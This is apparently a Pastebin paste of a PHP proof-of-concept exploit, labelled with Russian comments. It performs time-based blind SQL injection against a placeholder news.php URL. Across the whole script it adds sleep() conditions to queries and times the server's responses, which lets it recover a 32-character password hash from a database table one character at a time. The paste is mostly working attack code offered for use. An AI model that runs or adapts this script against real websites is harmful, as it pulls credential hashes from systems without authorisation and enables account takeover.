Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- $url = "http://site.ru/news.php?id=1"; //URL запроса до "+AND+..."
- $id = 0; //Номер пользователя
- $coef = 2; //Множитель
- $try = 5; //Кол-во проверочных запросов
- function avrg($arr) {
- foreach ($arr as $val) {
- $sum+=$val;
- }
- return $sum/count($arr);
- }
- function delta($url) {
- $tests = array();
- for($i=0;$i<=$try;$i++) {
- $time = time()+microtime();
- file_get_contents("$url+and+sleep(1)");
- $tests[$i] = time()+microtime()-$time;
- }
- return avrg($tests);
- }
- function testtime($url) {
- $time = time()+microtime();
- file_get_contents($url);
- return time()+microtime()-$time;
- }
- $delta = round($coef*delta($url));
- $testtime=testtime($url);
- echo "<b>Blind SQL-Injection pattern PoC-exploit by Root-access</b><br>";
- echo "Request type: $url+and+sleep(substring(version(),1,1))<br>";
- echo "Test time: $testtime<br>";
- $sym = array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
- $res = "";
- for($i=1;$i<33;$i++) {
- $time = time()+microtime();
- file_get_contents("$url+and+sleep($delta*(instr(0x30313233343536373839616263646566,substring((select+password+from+test+limit+$id,1),$i,1))))");
- $res = $res.$sym[round((time()+microtime()-$time-$testtime)/2-1)];
- }
- echo "Hash: ".$res;
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement